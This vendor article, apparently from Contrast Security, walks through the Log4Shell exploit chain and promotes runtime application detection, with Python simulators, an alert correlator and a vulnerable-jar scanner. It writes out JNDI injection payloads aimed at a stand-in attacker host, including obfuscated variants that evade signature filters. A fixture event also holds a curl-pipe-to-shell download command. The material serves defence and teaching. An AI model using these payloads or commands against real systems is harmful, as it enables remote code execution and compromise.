Anatomy of an Attack

In today's rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks on their applications. Understanding these threats, and the technologies built to counter them, is essential. This article walks through the inner workings of a typical application attack, using the notorious Log4Shell vulnerability as the example, and shows how Application Detection and Response (ADR) technology defends against zero-day threats of this kind.

The anatomy of a modern application attack: Log4Shell

To illustrate the complexity and severity of modern application attacks, let's examine an attack against the well-known Log4Shell vulnerability (CVE-2021-44228), which sent shockwaves through the cybersecurity world in late 2021. It is a textbook example of attack chaining: JNDI injection leads to Expression Language (EL) injection, which in turn leads to command injection.

Technical note: The CVE program, run by MITRE, publicly catalogs computer security flaws. Each CVE entry has a unique identifier so that IT and security professionals can share vulnerability information consistently across tools and services.

Step 1: Exploitation of the vulnerability

The Log4Shell vulnerability affects Log4j 2, a widely used Java logging framework. The attack begins when an attacker sends a specially crafted request to a vulnerable application; any attacker-controlled value that the application logs (a User-Agent header, a username, a search term) will do. The request carries a Java Naming and Directory Interface (JNDI) lookup string of the form:

${jndi:ldap://attacker-controlled-server.com/payload}

Technical note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory services to Java applications, letting them look up data and objects by name. In Log4Shell it is abused to make the application open a connection to a server the attacker controls.

Step 2: JNDI lookup and EL evaluation

When the vulnerable Log4j version logs this string, its message lookup substitution treats the ${jndi:...} segment as an expression to be evaluated. Evaluating it causes the application to perform a JNDI lookup, which reaches out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server named in the string.

Technical note: Log4j is a widely used Java logging framework maintained by the Apache Software Foundation. It is used across Java applications to log all kinds of data and events.

Step 3: Malicious payload retrieval

The attacker's LDAP server answers with a payload containing an EL injection. Because of how JNDI references are processed and how Log4j handles the response, this payload is handed to an EL evaluator as an expression to be evaluated.

Step 4: EL injection

The EL expression typically contains malicious code designed to abuse the EL interpreter. It may download and run additional malware, exfiltrate data, or establish a foothold in the system.

Technical note: Expression Language (EL) is a scripting language that gives access to application data. EL injection occurs when an attacker can influence or insert malicious EL expressions, which can lead to code execution. EL injection appears repeatedly among zero-day vulnerabilities, either directly or, as in this chain, as an intermediate link.

Step 5: Code execution

As the EL interpreter evaluates the injected expression, it executes the malicious code inside the compromised application. This gives the attacker a foothold in the system, usually with the same privileges as the application process itself.

The power and danger of Log4Shell

What makes Log4Shell so severe is the sheer breadth of Log4j deployment combined with how easy the vulnerability is to exploit. It raises the following concerns:

  1. Broad attack surface: Log4j is used in countless Java applications and frameworks, so this kind of vulnerability is widespread.
  2. Remote code execution: The JNDI injection can lead directly to remote code execution (RCE), giving attackers substantial control over the compromised system.
  3. Difficult detection: Log4Shell payloads can be obfuscated, for example by nesting lookups so that the string "jndi" is only assembled at evaluation time, which defeats simple pattern matching by network-based defenses.
  4. Chained attacks: The JNDI injection can be chained with other techniques, such as EL injection and command injection, to build more sophisticated attacks.
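The lookup substitution described in Steps 1 and 2, and the obfuscation that makes detection difficult (point 3 above, and the WAF-bypass point made later in this article), are easiest to see by simulating it. The following Python is an added example written for this page, not Contrast or Apache code: it re-implements a toy version of Log4j 2's recursive ${...} expansion with a handful of lookup prefixes (lower, upper, env, jndi), records the target that the jndi lookup would have contacted instead of connecting to it, and compares that with a naive network-side signature on the raw input. The format_msg_no_lookups flag mirrors the real log4j2.formatMsgNoLookups property, which Apache later found to be only a partial mitigation; the sample messages are constructed.

```python
"""Toy re-implementation of Log4j 2 lookup substitution (added example, not Apache or Contrast code)."""
import re
from typing import Callable, Dict, List, Optional, Tuple

# The innermost ${...}: a body with no nested "${" or "}". Recursive expansion resolves
# inner lookups first, which is exactly what lets an attacker assemble "jndi" at
# evaluation time from harmless-looking fragments.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Marker for a lookup that could not be resolved; Log4j leaves such text as-is, and the
# marker keeps the loop from rescanning it forever. Restored to "${" before returning.
_UNRESOLVED = "\x00{"

# The kind of network-side signature the article says is easy to evade: it only matches
# the literal prefix in the raw request.
NAIVE_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolvers(jndi_targets: List[str]) -> Dict[str, Callable[[str], str]]:
    """Lookup prefixes supported by this toy. Real Log4j has many more (sys, ctx, date, ...)."""
    def jndi(target: str) -> str:
        # Real Log4j performs InitialContext.lookup(target) here, i.e. it connects to the
        # attacker's LDAP server. The simulation only records where it would have gone.
        jndi_targets.append(target)
        return "<jndi-object>"

    return {
        "lower": str.lower,
        "upper": str.upper,
        "env": lambda key: "",  # constructed: pretend the process has no environment variables
        "jndi": jndi,
    }


def resolve_lookups(message: str, format_msg_no_lookups: bool = False,
                    max_rounds: int = 64) -> Tuple[str, List[str]]:
    """Render one logged message. Returns (rendered text, JNDI targets that would be contacted)."""
    jndi_targets: List[str] = []
    if format_msg_no_lookups:
        # Mirrors log4j2.formatMsgNoLookups=true: the message is logged verbatim.
        return message, jndi_targets
    resolvers = _resolvers(jndi_targets)
    for _ in range(max_rounds):
        match = _INNERMOST.search(message)
        if match is None:
            break
        body = match.group(1)
        # Log4j syntax: ${prefix:key:-default}. The default is what makes "${::-j}" resolve to "j".
        expr, has_default, default = body.partition(":-")
        prefix, _, key = expr.partition(":")
        handler = resolvers.get(prefix)
        value: Optional[str]
        if handler is not None:
            value = handler(key)
        elif has_default:
            value = default
        else:
            value = None
        if value is None:
            value = _UNRESOLVED + body + "}"
        message = message[:match.start()] + value + message[match.end():]
    return message.replace(_UNRESOLVED, "${"), jndi_targets


def analyze(message: str, format_msg_no_lookups: bool = False) -> Dict[str, object]:
    """Contrast a signature match on the raw input with what the application would actually do."""
    rendered, targets = resolve_lookups(message, format_msg_no_lookups)
    return {
        "rendered": rendered,
        "jndi_targets": targets,
        "naive_signature_hit": bool(NAIVE_SIGNATURE.search(message)),
        "in_app_detection": bool(targets),
    }


# Constructed sample values an application might log, e.g. from a User-Agent header.
SAMPLES = [
    "User-Agent: ${jndi:ldap://attacker-controlled-server.com/payload}",
    "User-Agent: ${${lower:J}ndi:${lower:LDAP}://attacker-controlled-server.com/payload}",
    "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:ldap://attacker-controlled-server.com/payload}",
    "User-Agent: Mozilla/5.0 (compatible; ExampleBot/1.0)",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = analyze(sample)
        print(f"{sample}\n  signature hit: {result['naive_signature_hit']}"
              f"  in-app detection: {result['in_app_detection']}  targets: {result['jndi_targets']}")
```

Only the first sample trips the naive signature; the second and third resolve to the same LDAP target once the lookups are expanded, which is the point of inspecting the behavior inside the application rather than the bytes on the wire.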

This anatomy of the Log4Shell attack shows why application-layer attacks are so potent, and why defenses such as Application Detection and Response (ADR), discussed in detail below, are essential to detect and prevent them.

From entry point to objectives

Once initial access is established, attackers can use that foothold for further tactics in pursuit of their objectives, such as:

  • Privilege escalation: exploiting local vulnerabilities to gain elevated privileges on the compromised system.
  • Reconnaissance: using the access gained to explore the internal network for other vulnerable systems or valuable data.
  • Credential harvesting: mining the compromised system for credentials stored in memory or in configuration files.
  • Lateral movement: using harvested credentials or other vulnerabilities to break into additional systems on the network.
  • Data exfiltration or ransomware deployment: depending on their goals, stealing sensitive data or deploying ransomware across the compromised network.

The limitations of current security approaches

Before getting into the details of ADR, it helps to understand the notable gap it fills in many organizations' security strategies: the lack of robust threat detection at the application layer.

Web application firewalls (WAFs)

Many organizations rely on WAFs as their primary defense against application-level threats. This approach has several critical limitations:

  • Network-centric focus: WAFs sit in front of the application and inspect incoming traffic for known attack patterns. That works against known signatures but gives almost no insight into what actually happens inside the application.
  • False positives: Lacking application context, WAFs often generate large volumes of false positives, which swamp security teams and lead to alert fatigue.
  • Susceptibility to bypass: WAF evasion is surprisingly easy. Attackers routinely slip past WAF rules with encoding variations, protocol-level evasion, or payload padding.
  • Poor SOC integration: Even where WAFs are deployed, they are often not configured to feed meaningful application-level data to the security operations center (SOC).

Technical note: A WAF is a security control that monitors, filters, and blocks HTTP traffic to and from a web application. It operates in the network path in front of the application and aims to protect web applications from attacks such as Cross-Site Scripting (XSS) and SQL injection.

Technical note: WAF bypasses are techniques attackers use to neutralize WAF controls, either by sneaking malicious payloads past the WAF's signature-based rules or by reaching the application through a path the WAF does not cover at all. Application security needs a layered defense; no single control should be relied on to secure the application layer.

Endpoint Detection and Response (EDR)

EDR solutions focus on monitoring and protecting individual endpoints across an organization. Essential as they are, they have their own limitations when it comes to application security:

  • Endpoint-centric focus: EDR mainly tracks system-level events and processes, not application-specific behavior.
  • Limited insight into application internals: EDR has no visibility into what happens inside the application's own code.
  • Reactive by nature: EDR frequently identifies a threat only after the malicious code has already executed on the endpoint.
  • Gaps in cloud and web application coverage: As applications move to cloud services, traditional EDR can leave gaps.

Technical note: EDR is a security technology that continuously monitors and responds to threats on endpoint devices such as desktops, laptops, servers, and mobile devices. EDR solutions collect and analyze endpoint data so that security operations teams can identify, investigate, and remediate suspicious activity and potential breaches. They typically provide real-time visibility, threat detection, and automated response, focused on endpoint-level activity rather than application-specific behavior.

The ADR advantage

ADR technology addresses these limitations by operating inside the application itself. This approach brings several key benefits:

  1. Deep application visibility: ADR observes code execution and data flow, a level of visibility that network-level solutions simply cannot match.
  2. Context-aware detection: Because it understands the application's behavior, ADR can distinguish legitimate activity from genuine threats far more accurately, sharply reducing false positives.
  3. Zero-day protection: ADR's understanding of the application lets it recognize and stop novel attack patterns, giving better protection against zero-day vulnerabilities.
  4. Layered defense behind the WAF: ADR is a critical second line of defense, able to detect attacks that have already slipped past the WAF.
  5. Rich, actionable insight: ADR delivers detailed, context-rich intelligence on application-level threats straight to SOC teams, closing the visibility gap and enabling faster, better-informed response.

By deploying ADR, organizations close this crucial gap in their security posture and gain the ability to see and stop sophisticated application-level threats that existing solutions would miss.

Technical note: ADR is a security approach focused on detecting and responding to threats at the application layer. Unlike AppSec controls that operate at the network level, ADR runs inside the application itself, giving deeper insight into application behavior and more accurate threat detection.

Technical note: A zero-day vulnerability is a software security flaw that is not yet known to the vendor, or is known but not yet fixed. Attackers can exploit it in the window before the vendor discovers it and ships a patch.

Contrast ADR in action

Contrast Security's ADR technology identifies and blocks attacks like Log4Shell at multiple stages. Let's look at the architecture that makes this possible and what it means in practice.

Contrast ADR architecture

Contrast ADR uses an agent-based architecture that integrates directly with the application runtime:

  • Agent deployment: A lightweight agent is installed in the application's runtime environment (for Java applications, the Java Virtual Machine, or JVM).
  • Runtime integration: The agent hooks into the running application, allowing it to monitor and analyze application behavior in real time.
  • Instrumentation: Contrast uses instrumentation to observe code execution, data flow, and API calls without modifying the application's source code.
  • Response: When a threat is detected, Contrast can act immediately, blocking the malicious activity or alerting security teams.

Multi-layer defense against Log4Shell

Step 1: JNDI injection detection

Contrast Runtime Security detects the illegitimate JNDI lookup attempt by hardening the JVM's security settings to prevent abuse of JNDI.

Step 2: EL injection detection

Contrast Runtime Security detects EL injection attempts and blocks them by hardening the JVM's security settings so that the JVM's EL processor cannot be abused.

Step 3: Code execution prevention

In the rare case that malicious code is loaded anyway, the Contrast Runtime Security Platform applies:

  • Command injection protection: classification, tracing, and semantic analysis to keep attacker-controlled payloads away from sensitive APIs.
  • Process hardening: tightened JVM security settings that prevent abuse of the JVM's command-execution APIs.

Practical example: detecting and analyzing a Log4Shell attack

To see how Contrast's ADR technology works in practice, let's walk through the sequence of events from a simulated detection of a Log4Shell attack.

Note: For this example all behavioral rules are in MONITOR mode rather than BLOCK mode, so that the chaining of the attacker's exploits and the layered detection of Contrast ADR can be observed. Normally these rules run in BLOCK mode, which stops the initial JNDI exploit and therefore prevents every subsequent stage.

  1. JNDI injection detected: Contrast ADR identifies a JNDI injection attempt, detecting an effort to redirect an InitialContext lookup to an LDAP server controlled by the attacker.
  2. EL injection detected: ADR identifies an EL injection event in which the evaluated expression uses Java class loading to reach the JavaScript engine embedded in the JVM. The payload uses JavaScript to build a malicious array intended for executing system commands.
  3. Command injection detected: Contrast ADR identifies a command injection event in which the command attempts to download and execute a shell script from a server controlled by the attacker.

This breakdown demonstrates Contrast ADR's ability to:

  1. Spot the initial JNDI injection attempt
  2. Follow the attack across multiple stages of execution
  3. Recognize and analyze the malicious payloads
  4. Provide deep insight into the attack chain, from the initial exploit through to attempted code execution

This level of insight is crucial both for stopping attacks and for understanding emerging threat patterns.
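The three-event sequence above is what a SOC would receive from ADR in MONITOR mode. The Python below is an added example, not Contrast's code or event schema: it correlates constructed ADR-style events by request into an attack chain, rates severity by how far along the chain the request got, extracts the attacker URLs as indicators for SIEM/SOAR blocking, and shows what the same traffic looks like when the rules run in BLOCK mode, where the chain stops at the first stage. The event field names, rule names, timestamps and sample events are all assumptions.

```python
"""Correlate ADR-style detection events into an attack chain (added example, not Contrast code)."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Assumed rule names, ordered by how far along the Log4Shell chain each one sits.
STAGE_ORDER = {"jndi-injection": 1, "el-injection": 2, "command-injection": 3}
SEVERITY_BY_DEPTH = {1: "medium", 2: "high", 3: "critical"}
# URLs worth handing to the SIEM/SOAR as indicators: the JNDI target and the download server.
INDICATOR = re.compile(r"\b(?:ldaps?|rmi|dns|https?)://[^\s\"'<>|]+")

# Constructed events in an assumed schema (timestamps sort lexically in this format).
EVENTS: List[Dict[str, str]] = [
    {"ts": "2024-05-01T10:00:00.000Z", "app": "orders-api", "request_id": "r-1001",
     "rule": "jndi-injection",
     "detail": 'InitialContext.lookup("ldap://attacker-controlled-server.com/payload")'},
    {"ts": "2024-05-01T10:00:00.120Z", "app": "orders-api", "request_id": "r-1001",
     "rule": "el-injection",
     "detail": "EL expression loads javax.script.ScriptEngineManager and evaluates JavaScript"},
    {"ts": "2024-05-01T10:00:00.350Z", "app": "orders-api", "request_id": "r-1001",
     "rule": "command-injection",
     "detail": 'Runtime.exec: sh -c "curl -s http://attacker-controlled-server.com/payload.sh | sh"'},
    {"ts": "2024-05-01T10:02:17.004Z", "app": "orders-api", "request_id": "r-1002",
     "rule": "jndi-injection",
     "detail": 'InitialContext.lookup("ldap://203.0.113.7:1389/a")'},  # lone probe, no follow-up
]


def correlate(events: List[Dict[str, str]]) -> Dict[str, Dict[str, object]]:
    """Group events by request and describe how far each chain progressed."""
    by_request: Dict[str, List[Dict[str, str]]] = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        by_request[event["request_id"]].append(event)
    chains: Dict[str, Dict[str, object]] = {}
    for request_id, evs in by_request.items():
        stages = [e["rule"] for e in evs]
        depth = max(STAGE_ORDER.get(rule, 0) for rule in stages)
        indicators: List[str] = []
        for e in evs:
            for url in INDICATOR.findall(e["detail"]):
                if url not in indicators:
                    indicators.append(url)
        chains[request_id] = {
            "app": evs[0]["app"],
            "request_id": request_id,
            "first_seen": evs[0]["ts"],
            "last_seen": evs[-1]["ts"],
            "stages": stages,
            "depth": depth,
            "severity": SEVERITY_BY_DEPTH.get(depth, "info"),
            "indicators": indicators,
        }
    return chains


def apply_mode(events: List[Dict[str, str]], mode: str) -> Tuple[List[Dict[str, str]], List[str]]:
    """Simulate MONITOR vs BLOCK. In BLOCK mode the first matching rule ends the request, so
    later stages never happen. Returns (events that still occur, request ids that were blocked)."""
    if mode != "BLOCK":
        return list(events), []
    kept: List[Dict[str, str]] = []
    blocked: List[str] = []
    for event in sorted(events, key=lambda e: e["ts"]):
        if event["request_id"] in blocked:
            continue  # the request was already terminated; this stage does not occur
        kept.append(event)
        if event["rule"] in STAGE_ORDER:
            blocked.append(event["request_id"])
    return kept, blocked


def to_siem_alert(chain: Dict[str, object]) -> Dict[str, object]:
    """Shape one chain as an enriched alert for the SIEM/SOAR (assumed field names)."""
    stages = chain["stages"]
    return {
        "app": chain["app"],
        "request_id": chain["request_id"],
        "severity": chain["severity"],
        "attack_chain": " -> ".join(stages),
        "indicators": chain["indicators"],
        "summary": f"{chain['app']}: {len(stages)}-stage application attack reached "
                   f"'{stages[-1]}' (severity {chain['severity']})",
    }


if __name__ == "__main__":
    for mode in ("MONITOR", "BLOCK"):
        visible, blocked = apply_mode(EVENTS, mode)
        print(f"== {mode} mode (blocked requests: {blocked})")
        for chain in correlate(visible).values():
            print(to_siem_alert(chain))
```

In MONITOR mode request r-1001 surfaces as a critical three-stage chain with both attacker URLs attached; in BLOCK mode the same request never gets past the JNDI stage, which is the behavior the note above describes.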

ADR response to a Log4Shell attack

When it detects a potential Log4Shell exploitation attempt, Contrast ADR triggers a comprehensive response that maps to the functions of the NIST Cybersecurity Framework:

Identify

  • Uses runtime Software Composition Analysis (SCA) to continuously map and inventory the application environment, identifying vulnerable Log4j instances.
  • Provides real-time visibility into the application's behavior and data flow during the attack attempt.
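The inventory step under Identify, as an added example written for this page rather than Contrast's runtime SCA: a Python scanner that walks a directory for Java archives (including jars nested inside WARs and EARs), reads the log4j-core version from its Maven pom.properties, checks whether the JndiLookup class is still present, and reports each instance as vulnerable, mitigated (class removed, the workaround Apache's advisory describes) or patched against CVE-2021-44228. The fixed-version floors are Apache's published ones (2.15.0, with 2.12.2 and 2.3.1 for older Java); later Log4j advisories raised the recommended version to 2.17.1, so read "patched" here as "not exposed to this CVE", not "fully current". The fixture archives are constructed, not real jars.

```python
"""Inventory Log4j 2 core archives and flag CVE-2021-44228 exposure (added example, not Contrast's SCA)."""
import io
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, Iterator, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); tolerant of suffixes such as '2.15.0-rc2'."""
    return tuple(int(part) for part in re.findall(r"\d+", text)[:3])


def fixed_for_cve_2021_44228(version: Tuple[int, ...]) -> bool:
    """Apache's fixed releases for this CVE: 2.15.0, plus the 2.12.2 (Java 7) and 2.3.1 (Java 6) backports."""
    return (version >= (2, 15, 0)
            or (2, 12, 2) <= version < (2, 13, 0)
            or (2, 3, 1) <= version < (2, 4, 0))


def _core_version(archive: zipfile.ZipFile) -> Optional[str]:
    """Version of log4j-core in this archive from its Maven metadata, or None if it is not log4j-core."""
    if POM_PROPERTIES not in archive.namelist():
        return None
    for line in archive.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(location: str, data: bytes) -> Iterator[Dict[str, object]]:
    """Yield a finding for log4j-core in this archive and in any archive nested inside it (WAR/EAR/fat jar)."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container; nothing to inspect
    with archive:
        names = archive.namelist()
        version = _core_version(archive)
        if version is not None:
            has_jndi_lookup = JNDI_LOOKUP_CLASS in names
            if fixed_for_cve_2021_44228(parse_version(version)):
                status = "patched"
            elif not has_jndi_lookup:
                status = "mitigated"  # JndiLookup.class deleted from the jar, the workaround in Apache's advisory
            else:
                status = "vulnerable"
            yield {"location": location, "version": version,
                   "jndi_lookup_present": has_jndi_lookup, "status": status}
        for entry in names:
            if entry.endswith(ARCHIVE_SUFFIXES):
                yield from scan_archive(f"{location}!/{entry}", archive.read(entry))


def scan_directory(root: Path) -> List[Dict[str, object]]:
    """Walk a deployment directory and collect findings from every Java archive in it."""
    findings: List[Dict[str, object]] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in ARCHIVE_SUFFIXES:
            findings.extend(scan_archive(str(path), path.read_bytes()))
    return findings


def make_fixture_archive(version: Optional[str], include_jndi_lookup: bool = True,
                         nested: Optional[Tuple[str, bytes]] = None) -> bytes:
    """Constructed fixture: a zip shaped like log4j-core (or a WAR wrapping one). Not a real jar."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        if version is not None:
            archive.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                                             f"artifactId=log4j-core\nversion={version}\n")
            if include_jndi_lookup:
                archive.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a class
        if nested is not None:
            archive.writestr(nested[0], nested[1])
    return buffer.getvalue()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(make_fixture_archive("2.14.1"))
        (root / "lib" / "log4j-core-2.17.1.jar").write_bytes(make_fixture_archive("2.17.1"))
        (root / "lib" / "log4j-core-2.14.1-stripped.jar").write_bytes(make_fixture_archive("2.14.1", False))
        (root / "orders.war").write_bytes(make_fixture_archive(
            None, nested=("WEB-INF/lib/log4j-core-2.14.1.jar", make_fixture_archive("2.14.1"))))
        for finding in scan_directory(root):
            print(f"{finding['status']:<10} {finding['version']:<8} {finding['location']}")
```

Point scan_directory at a real deployment root (a Tomcat webapps directory, an application's lib folder) to get the same report for real archives; the nested-archive recursion matters because log4j-core is far more often found inside a WAR or fat jar than sitting loose on disk.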

Protect

  • In blocking mode, the initial JNDI lookup to the malicious server is prevented outright.
  • Hardened JVM security settings restrict JNDI capabilities, reducing the attack surface.

Detect

  • Detection and alerting on the JNDI lookup attempt to the malicious LDAP server.
  • Detection of attempts to evaluate malicious EL payloads.
  • Monitoring of unauthorized Java class loading and execution.
  • Identification of suspicious process execution indicating command injection.

Respond

  • Triggers predefined runbooks for Log4Shell incidents.
  • Provides enriched triage context, including a detailed attack chain analysis and the affected application components.
  • Integrates with SIEM/XDR/SOAR systems, enriching alerts with application-layer context for faster incident analysis.

Technical note: SIEM (Security Information and Event Management) is a system that collects and analyzes log data from sources across an organization's IT infrastructure. It supports real-time analysis of security alerts generated by applications and network hardware. Examples include Splunk, QRadar, and Microsoft Sentinel.

Technical note: XDR (Extended Detection and Response) is a security approach that collects and automatically correlates data across multiple security layers, including email, endpoints, servers, cloud workloads, and networks. It applies analytics to detect threats and respond to them automatically, giving a more unified and effective way to detect, investigate, and respond to incidents across the whole IT environment.

Recover

  • Supports incident investigation with detailed forensic data on the attack attempt.
  • Helps determine the full scope of potential compromise across the application portfolio.
  • Enables post-incident review to improve detection and protection capabilities.
  • Provides data for root cause analysis, helping prevent similar incidents in the future.

Throughout, the ADR system maintains continuous monitoring, feeds real-time updates to security dashboards, and supports compliance reporting by documenting every detection and response action taken.

Integrating ADR with the SIEM/SOAR/XDR ecosystem

Combining ADR technology with existing Security Information and Event Management (SIEM), security orchestration, automation, and response (SOAR), and Extended Detection and Response (XDR) systems creates a powerful synergy that strengthens overall security operations. ADR can fit into and enhance SIEM/SOAR/XDR-driven workflows in several ways:

  • Better incident response and analysis: ADR alerts are correlated with network-level events in the SIEM/SOAR/XDR, giving a complete view of a potential attack and enabling more effective root cause analysis.
  • Adaptive security control: The SIEM/SOAR/XDR can dynamically switch ADR into blocking mode, deploy virtual patches, and turn on enhanced logging.
  • Coordinated threat mitigation: The SIEM/SOAR/XDR orchestrates blocking of malicious IP addresses while drawing on ADR's application-specific context to shape the response.
  • Streamlined security-development collaboration: ADR generates vulnerability reports and integrates with ticketing systems, improving communication between security and development teams.

By folding ADR into the SIEM/SOAR/XDR ecosystem, organizations gain more comprehensive threat detection, faster incident response, and more efficient vulnerability management, substantially improving their overall security posture.

Business benefits of ADR technology

Deploying Contrast's ADR technology delivers tangible business benefits:

  1. Reduced risk: Multi-layered, context-aware protection significantly lowers the risk of a successful attack, safeguarding the organization's data and reputation.
  2. Lower total cost of ownership: With fewer false positives and automated protection, security teams can focus on high-priority issues, reducing operational cost.
  3. Stronger compliance posture: ADR's comprehensive protection and detailed logging help meet the requirements of frameworks such as PCI DSS and GDPR.
  4. Faster time to market: By protecting applications from within, ADR lets development teams move quickly without lowering security standards, in line with Secure by Design principles.
  5. Greater visibility: The deep insight ADR provides improves overall security posture and informs strategic security decisions.

Technical note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security requirements intended to ensure that every company that accepts, processes, stores, or transmits credit card data maintains a secure environment.

Technical note: GDPR (General Data Protection Regulation) is an EU regulation on data protection and privacy in the European Union and the European Economic Area. It also governs the transfer of personal data outside the EU and EEA.

Summary

As cyber threats evolve, network-based approaches to application security are no longer enough to protect critical applications and data. Contrast's ADR technology offers a robust, intelligent, and proactive approach to application security.

By understanding the anatomy of modern attacks and using advanced ADR solutions, organizations can substantially strengthen their security posture, reduce risk, and stay ahead of emerging threats. For a security decision-maker, investing in ADR technology is more than a security precaution; it is a strategic necessity for protecting the organization's digital assets in today's threat landscape.

Next steps

To learn more about how ADR technology can protect your organization and see its capabilities firsthand, request a demo of Contrast ADR.

Taking these steps puts you on the path to stronger application security and staying ahead of evolving cyber threats.

Note: This article was contributed by Jonathan Harper, Principal Solutions Engineer at Contrast Security, who has more than five years of experience in application security. Jonathan has worked with large enterprises and previously held roles at Threat Stack, Veracode, and Micron Technology.

This article is a contributed piece from one of our partners.
